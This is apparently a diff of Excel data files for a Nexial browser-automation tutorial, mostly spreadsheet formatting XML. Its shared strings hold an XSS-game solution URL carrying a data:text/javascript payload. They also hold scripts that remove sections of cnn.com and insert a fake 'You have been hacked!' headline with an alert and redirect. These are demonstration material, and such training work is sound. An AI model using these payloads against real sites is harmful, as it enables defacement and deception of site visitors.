+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
     <dxf>
       <font>
         <b val="0"/>
@@ -693,8 +1067,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
   <dimension ref="A1:AAA9"/>
   <sheetViews>
-    <sheetView tabSelected="1" zoomScalePageLayoutView="125" workbookViewId="0">
-      <selection activeCell="A8" sqref="A8"/>
+    <sheetView zoomScalePageLayoutView="125" workbookViewId="0">
+      <selection activeCell="A3" sqref="A3:B3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
@@ -721,7 +1095,7 @@
         <v>4</v>
       </c>
       <c r="B2" s="2" t="s">
-        <v>25</v>
+        <v>10</v>
       </c>
       <c r="HA2" s="6"/>
       <c r="AAA2" s="6"/>
@@ -768,7 +1142,7 @@
     </row>
     <row r="7" spans="1:703">
       <c r="A7" s="1" t="s">
-        <v>30</v>
+        <v>12</v>
       </c>
       <c r="B7" s="2" t="s">
         <v>0</v>
@@ -778,10 +1152,10 @@
     </row>
     <row r="8" spans="1:703">
       <c r="A8" s="1" t="s">
-        <v>29</v>
+        <v>11</v>
       </c>
       <c r="B8" s="2" t="s">
-        <v>23</v>
+        <v>9</v>
       </c>
       <c r="HA8" s="4"/>
       <c r="AAA8" s="5"/>
@@ -793,21 +1167,21 @@
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
   <conditionalFormatting sqref="A1:A1048576">
-    <cfRule type="beginsWith" dxfId="9" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+    <cfRule type="beginsWith" dxfId="26" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
-    <cfRule type="beginsWith" dxfId="8" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
+    <cfRule type="beginsWith" dxfId="25" priority="2" stopIfTrue="1" operator="beginsWith" text="nexial.">
       <formula>LEFT(A1,LEN("nexial."))="nexial."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="7" priority="3" stopIfTrue="1">
+    <cfRule type="notContainsBlanks" dxfId="24" priority="3" stopIfTrue="1">
       <formula>LEN(TRIM(A1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
   <conditionalFormatting sqref="B1:B1048576">
-    <cfRule type="expression" dxfId="6" priority="4" stopIfTrue="1">
+    <cfRule type="expression" dxfId="23" priority="4" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>
-    <cfRule type="notContainsBlanks" dxfId="5" priority="5">
+    <cfRule type="notContainsBlanks" dxfId="22" priority="5">
       <formula>LEN(TRIM(B1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
@@ -818,16 +1192,16 @@
 
 <file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{02992098-561F-1944-A340-34CB95735B3B}">
-  <dimension ref="A1:AAA9"/>
+  <dimension ref="A1:AAA34"/>
   <sheetViews>
-    <sheetView zoomScale="118" zoomScalePageLayoutView="125" workbookViewId="0">
-      <selection activeCell="A10" sqref="A10"/>
+    <sheetView tabSelected="1" zoomScale="118" zoomScalePageLayoutView="125" workbookViewId="0">
+      <selection activeCell="A31" sqref="A31"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
   <cols>
-    <col min="1" max="1" width="34" style="1" customWidth="1" collapsed="1"/>
-    <col min="2" max="2" width="27" style="2" customWidth="1" collapsed="1"/>
+    <col min="1" max="1" width="19.1640625" style="1" customWidth="1" collapsed="1"/>
+    <col min="2" max="2" width="96" style="2" bestFit="1" customWidth="1" collapsed="1"/>
     <col min="3" max="9" width="27" style="3" customWidth="1" collapsed="1"/>
     <col min="10" max="27" width="21.1640625" style="3" customWidth="1" collapsed="1"/>
     <col min="28" max="16384" width="10.83203125" style="3" collapsed="1"/>
@@ -835,97 +1209,347 @@
   <sheetData>
     <row r="1" spans="1:703">
       <c r="A1" s="1" t="s">
-        <v>26</v>
+        <v>5</v>
       </c>
       <c r="B1" s="2" t="s">
-        <v>27</v>
+        <v>0</v>
       </c>
       <c r="HA1" s="6"/>
       <c r="AAA1" s="6"/>
     </row>
     <row r="2" spans="1:703">
       <c r="A2" s="1" t="s">
-        <v>9</v>
-      </c>
-      <c r="B2" s="2" t="s">
-        <v>22</v>
+        <v>13</v>
+      </c>
+      <c r="B2" s="7" t="s">
+        <v>14</v>
       </c>
       <c r="HA2" s="6"/>
       <c r="AAA2" s="6"/>
     </row>
     <row r="3" spans="1:703">
       <c r="A3" s="1" t="s">
-        <v>10</v>
+        <v>15</v>
       </c>
       <c r="B3" s="2" t="s">
-        <v>11</v>
-      </c>
-      <c r="HA3" s="4"/>
-      <c r="AAA3" s="5"/>
+        <v>16</v>
+      </c>
+      <c r="HA3" s="6"/>
+      <c r="AAA3" s="6"/>
     </row>
     <row r="4" spans="1:703">
       <c r="A4" s="1" t="s">
-        <v>12</v>
+        <v>19</v>
       </c>
       <c r="B4" s="2" t="s">
-        <v>13</v>
-      </c>
-      <c r="HA4" s="4"/>
-      <c r="AAA4" s="5"/>
+        <v>20</v>
+      </c>
+      <c r="HA4" s="6"/>
+      <c r="AAA4" s="6"/>
     </row>
     <row r="5" spans="1:703">
       <c r="A5" s="1" t="s">
-        <v>14</v>
+        <v>24</v>
       </c>
       <c r="B5" s="2" t="s">
-        <v>15</v>
-      </c>
-      <c r="HA5" s="4"/>
-      <c r="AAA5" s="5"/>
+        <v>25</v>
+      </c>
+      <c r="HA5" s="6"/>
+      <c r="AAA5" s="6"/>
     </row>
     <row r="6" spans="1:703">
       <c r="A6" s="1" t="s">
-        <v>16</v>
+        <v>26</v>
       </c>
       <c r="B6" s="2" t="s">
-        <v>17</v>
-      </c>
-      <c r="HA6" s="4"/>
-      <c r="AAA6" s="5"/>
+        <v>27</v>
+      </c>
+      <c r="HA6" s="6"/>
+      <c r="AAA6" s="6"/>
     </row>
     <row r="7" spans="1:703">
       <c r="A7" s="1" t="s">
-        <v>19</v>
+        <v>28</v>
       </c>
       <c r="B7" s="2" t="s">
-        <v>18</v>
-      </c>
-      <c r="HA7" s="4"/>
-      <c r="AAA7" s="5"/>
+        <v>29</v>
+      </c>
+      <c r="HA7" s="6"/>
+      <c r="AAA7" s="6"/>
     </row>
     <row r="8" spans="1:703">
       <c r="A8" s="1" t="s">
-        <v>20</v>
+        <v>17</v>
       </c>
       <c r="B8" s="2" t="s">
-        <v>21</v>
+        <v>18</v>
       </c>
       <c r="HA8" s="4"/>
       <c r="AAA8" s="5"/>
     </row>
     <row r="9" spans="1:703">
       <c r="A9" s="1" t="s">
-        <v>28</v>
+        <v>38</v>
       </c>
       <c r="B9" s="2" t="s">
-        <v>24</v>
+        <v>21</v>
       </c>
       <c r="HA9" s="4"/>
       <c r="AAA9" s="5"/>
     </row>
+    <row r="10" spans="1:703">
+      <c r="A10" s="1" t="s">
+        <v>32</v>
+      </c>
+      <c r="B10" s="2" t="s">
+        <v>22</v>
+      </c>
+      <c r="HA10" s="4"/>
+      <c r="AAA10" s="5"/>
+    </row>
+    <row r="11" spans="1:703">
+      <c r="A11" s="1" t="s">
+        <v>39</v>
+      </c>
+      <c r="B11" s="2" t="s">
+        <v>23</v>
+      </c>
+      <c r="HA11" s="4"/>
+      <c r="AAA11" s="5"/>
+    </row>
+    <row r="12" spans="1:703">
+      <c r="A12" s="1" t="s">
+        <v>30</v>
+      </c>
+      <c r="B12" s="2" t="s">
+        <v>31</v>
+      </c>
+    </row>
+    <row r="13" spans="1:703">
+      <c r="A13" s="1" t="s">
+        <v>33</v>
+      </c>
+      <c r="B13" s="2" t="s">
+        <v>34</v>
+      </c>
+    </row>
+    <row r="14" spans="1:703">
+      <c r="A14" s="1" t="s">
+        <v>35</v>
+      </c>
+      <c r="B14" s="2" t="s">
+        <v>40</v>
+      </c>
+    </row>
+    <row r="15" spans="1:703">
+      <c r="A15" s="1" t="s">
+        <v>36</v>
+      </c>
+      <c r="B15" s="2" t="s">
+        <v>37</v>
+      </c>
+    </row>
+    <row r="16" spans="1:703">
+      <c r="A16" s="1" t="s">
+        <v>41</v>
+      </c>
+      <c r="B16" s="2" t="s">
+        <v>66</v>
+      </c>
+    </row>
+    <row r="17" spans="1:2">
+      <c r="A17" s="1" t="s">
+        <v>42</v>
+      </c>
+      <c r="B17" s="2" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="18" spans="1:2">
+      <c r="A18" s="1" t="s">
+        <v>43</v>
+      </c>
+      <c r="B18" s="2" t="s">
+        <v>46</v>
+      </c>
+    </row>
+    <row r="19" spans="1:2">
+      <c r="A19" s="1" t="s">
+        <v>44</v>
+      </c>
+      <c r="B19" s="2" t="s">
+        <v>47</v>
+      </c>
+    </row>
+    <row r="20" spans="1:2">
+      <c r="A20" s="1" t="s">
+        <v>48</v>
+      </c>
+      <c r="B20" s="2" t="s">
+        <v>52</v>
+      </c>
+    </row>
+    <row r="21" spans="1:2">
+      <c r="A21" s="1" t="s">
+        <v>49</v>
+      </c>
+      <c r="B21" s="2" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="22" spans="1:2">
+      <c r="A22" s="1" t="s">
+        <v>50</v>
+      </c>
+      <c r="B22" s="2" t="s">
+        <v>53</v>
+      </c>
+    </row>
+    <row r="23" spans="1:2">
+      <c r="A23" s="1" t="s">
+        <v>51</v>
+      </c>
+      <c r="B23" s="2" t="s">
+        <v>47</v>
+      </c>
+    </row>
+    <row r="24" spans="1:2">
+      <c r="A24" s="1" t="s">
+        <v>54</v>
+      </c>
+      <c r="B24" s="2" t="s">
+        <v>58</v>
+      </c>
+    </row>
+    <row r="25" spans="1:2">
+      <c r="A25" s="1" t="s">
+        <v>55</v>
+      </c>
+      <c r="B25" s="2" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="26" spans="1:2">
+      <c r="A26" s="1" t="s">
+        <v>56</v>
+      </c>
+      <c r="B26" s="2" t="s">
+        <v>59</v>
+      </c>
+    </row>
+    <row r="27" spans="1:2">
+      <c r="A27" s="1" t="s">
+        <v>57</v>
+      </c>
+      <c r="B27" s="2" t="s">
+        <v>47</v>
+      </c>
+    </row>
+    <row r="28" spans="1:2">
+      <c r="A28" s="1" t="s">
+        <v>60</v>
+      </c>
+      <c r="B28" s="2" t="s">
+        <v>62</v>
+      </c>
+    </row>
+    <row r="29" spans="1:2">
+      <c r="A29" s="1" t="s">
+        <v>61</v>
+      </c>
+      <c r="B29" s="2" t="s">
+        <v>63</v>
+      </c>
+    </row>
+    <row r="30" spans="1:2">
+      <c r="A30" s="1" t="s">
+        <v>64</v>
+      </c>
+      <c r="B30" s="2" t="s">
+        <v>65</v>
+      </c>
+    </row>
+    <row r="31" spans="1:2">
+      <c r="A31" s="1" t="s">
+        <v>67</v>
+      </c>
+      <c r="B31" s="2" t="s">
+        <v>68</v>
+      </c>
+    </row>
+    <row r="32" spans="1:2">
+      <c r="A32" s="1" t="s">
+        <v>69</v>
+      </c>
+      <c r="B32" s="2" t="s">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="33" spans="1:2">
+      <c r="A33" s="1" t="s">
+        <v>70</v>
+      </c>
+      <c r="B33" s="2" t="s">
+        <v>72</v>
+      </c>
+    </row>
+    <row r="34" spans="1:2">
+      <c r="A34" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="B34" s="2" t="s">
+        <v>47</v>
+      </c>
+    </row>
   </sheetData>
   <sheetProtection sheet="1" formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
-  <conditionalFormatting sqref="A1:A1048576">
+  <conditionalFormatting sqref="A2:A23 A28:A1048576">
+    <cfRule type="beginsWith" dxfId="21" priority="18" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+      <formula>LEFT(A2,LEN("nexial.scope."))="nexial.scope."</formula>
+    </cfRule>
+    <cfRule type="beginsWith" dxfId="20" priority="19" stopIfTrue="1" operator="beginsWith" text="nexial.">
+      <formula>LEFT(A2,LEN("nexial."))="nexial."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="19" priority="20" stopIfTrue="1">
+      <formula>LEN(TRIM(A2))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B8:B23 B28:B1048576">
+    <cfRule type="expression" dxfId="18" priority="21" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="17" priority="22">
+      <formula>LEN(TRIM(B8))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B3:B7">
+    <cfRule type="expression" dxfId="16" priority="16" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="15" priority="17">
+      <formula>LEN(TRIM(B3))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="A24:A27">
+    <cfRule type="beginsWith" dxfId="14" priority="11" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
+      <formula>LEFT(A24,LEN("nexial.scope."))="nexial.scope."</formula>
+    </cfRule>
+    <cfRule type="beginsWith" dxfId="13" priority="12" stopIfTrue="1" operator="beginsWith" text="nexial.">
+      <formula>LEFT(A24,LEN("nexial."))="nexial."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="12" priority="13" stopIfTrue="1">
+      <formula>LEN(TRIM(A24))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="B24:B27">
+    <cfRule type="expression" dxfId="11" priority="14" stopIfTrue="1">
+      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
+    </cfRule>
+    <cfRule type="notContainsBlanks" dxfId="10" priority="15">
+      <formula>LEN(TRIM(B24))&gt;0</formula>
+    </cfRule>
+  </conditionalFormatting>
+  <conditionalFormatting sqref="A1">
     <cfRule type="beginsWith" dxfId="4" priority="1" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
       <formula>LEFT(A1,LEN("nexial.scope."))="nexial.scope."</formula>
     </cfRule>
@@ -936,7 +1560,7 @@
       <formula>LEN(TRIM(A1))&gt;0</formula>
     </cfRule>
   </conditionalFormatting>
-  <conditionalFormatting sqref="B1:B1048576">
+  <conditionalFormatting sqref="B1">
     <cfRule type="expression" dxfId="1" priority="4" stopIfTrue="1">
       <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
     </cfRule>

--- a/artifact/data/web-06.data.xlsx
+++ b/artifact/data/web-06.data.xlsx
@@ -1,23 +1,24 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="10904"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="10909"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/ml093043/projects/nexial/tutorials/artifact/data/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F9713E2C-3258-9B44-AD6B-3DDB5959648F}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{52677D69-CDEF-E847-9E21-85F65A1D366E}" xr6:coauthVersionLast="37" xr6:coauthVersionMax="37" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="440" windowWidth="25600" windowHeight="19340" tabRatio="500" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="0" yWindow="440" windowWidth="38780" windowHeight="10520" tabRatio="500" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="#default" sheetId="2" r:id="rId1"/>
-    <sheet name="level1" sheetId="3" r:id="rId2"/>
+    <sheet name="xss-games" sheetId="3" r:id="rId2"/>
+    <sheet name="js1" sheetId="4" r:id="rId3"/>
   </sheets>
   <externalReferences>
-    <externalReference r:id="rId3"/>
+    <externalReference r:id="rId4"/>
   </externalReferences>
   <definedNames>
     <definedName name="base">'[1]#system'!$B$2:$B$24</definedName>
@@ -50,7 +51,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="84" uniqueCount="73">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="112" uniqueCount="100">
   <si>
     <t>true</t>
   </si>
@@ -269,13 +270,192 @@
   </si>
   <si>
     <t>https://xss-game.appspot.com/level6/frame#data:text/javascript,alert('Hello')</t>
+  </si>
+  <si>
+    <t>https://www.cnn.com/</t>
+  </si>
+  <si>
+    <t>remove outbrain</t>
+  </si>
+  <si>
+    <t>var elem = document.querySelector('section.zn--idx-6'); 
+elem.parentNode.removeChild(elem);</t>
+  </si>
+  <si>
+    <t>remove partner content</t>
+  </si>
+  <si>
+    <t>var elem = document.querySelector('section.zn--idx-10'); 
+elem.parentNode.removeChild(elem);</t>
+  </si>
+  <si>
+    <t>remove video content</t>
+  </si>
+  <si>
+    <t>var elem = document.querySelector('section.zn--idx-5'); 
+elem.parentNode.removeChild(elem);</t>
+  </si>
+  <si>
+    <t>remove More CNN</t>
+  </si>
+  <si>
+    <t>var elem = document.querySelector('section.zn--idx-7'); 
+elem.parentNode.removeChild(elem);</t>
+  </si>
+  <si>
+    <t>remove CNN Photos</t>
+  </si>
+  <si>
+    <t>var elem = document.querySelector('section.zn--idx-8'); 
+elem.parentNode.removeChild(elem);</t>
+  </si>
+  <si>
+    <t>add new headlines</t>
+  </si>
+  <si>
+    <t>1st headline</t>
+  </si>
+  <si>
+    <t>haha msg</t>
+  </si>
+  <si>
+    <t>nexial title</t>
+  </si>
+  <si>
+    <t>'ul.cn--idx-2[data-vr-zone="home-top-col3"] li:nth-of-type(1)'</t>
+  </si>
+  <si>
+    <t>You have been hacked!  ;-)</t>
+  </si>
+  <si>
+    <t>https://nexiality.github.io/</t>
+  </si>
+  <si>
+    <t>nexial url</t>
+  </si>
+  <si>
+    <t>Nexial is AWESOME!</t>
+  </si>
+  <si>
+    <t>haha style</t>
+  </si>
+  <si>
+    <t>font-size:14pt; font-weight:bold; color:#f55; padding:3px 0; cursor: pointer;</t>
+  </si>
+  <si>
+    <r>
+      <t>jQuery(</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="5" tint="-0.499984740745262"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>${1st headline}</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>).prepend('&lt;li id="haha" onclick="alert(\'</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="5" tint="-0.499984740745262"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>${haha msg}</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>\'); document.location=\'</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="5" tint="-0.499984740745262"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>${nexial url}</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>\';" style="</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="5" tint="-0.499984740745262"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>${haha style}</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>"&gt;</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="5" tint="-0.499984740745262"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>${nexial title}</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <rFont val="Courier New"/>
+        <family val="1"/>
+      </rPr>
+      <t>&lt;/li&gt;')</t>
+    </r>
+  </si>
+  <si>
+    <t>nexial.browser</t>
+  </si>
+  <si>
+    <t>chrome</t>
+  </si>
+  <si>
+    <t>remove superheader</t>
+  </si>
+  <si>
+    <t>var elem = document.querySelector('#jpampsuperheader'); 
+elem.parentNode.removeChild(elem);</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="8">
+  <fonts count="9">
     <font>
       <sz val="12"/>
       <color theme="1"/>
@@ -324,6 +504,13 @@
     <font>
       <sz val="12"/>
       <color rgb="FF000000"/>
+      <name val="Courier New"/>
+      <family val="1"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="12"/>
+      <color theme="5" tint="-0.499984740745262"/>
       <name val="Courier New"/>
       <family val="1"/>
     </font>
@@ -384,7 +571,7 @@
     <xf numFmtId="0" fontId="5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="8">
+  <cellXfs count="10">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="49" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
       <alignment horizontal="left" vertical="center"/>
@@ -412,6 +599,14 @@
       <alignment horizontal="left" vertical="center"/>
       <protection locked="0"/>
     </xf>
+    <xf numFmtId="49" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+      <protection locked="0"/>
+    </xf>
+    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+      <protection locked="0"/>
+    </xf>
   </cellXfs>
   <cellStyles count="7">
     <cellStyle name="Followed Hyperlink" xfId="2" builtinId="9" hidden="1"/>
@@ -422,7 +617,165 @@
     <cellStyle name="Hyperlink" xfId="5" builtinId="8" hidden="1"/>
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="27">
+  <dxfs count="39">
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-4.9989318521683403E-2"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="0" tint="-0.14996795556505021"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.79998168889431442"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i val="0"/>
+        <strike val="0"/>
+        <color theme="4" tint="-0.24994659260841701"/>
+      </font>
+      <fill>
+        <patternFill>
+          <bgColor theme="4" tint="0.59996337778862885"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b val="0"/>
+        <i val="0"/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="1"/>
+      </font>
+      <fill>
+        <patternFill patternType="none">
+          <bgColor auto="1"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <font>
+        <b/>
+        <i/>
+        <strike val="0"/>
+        <u val="none"/>
+        <color theme="0" tint="-0.499984740745262"/>
+      </font>
+      <fill>
+        <patternFill>
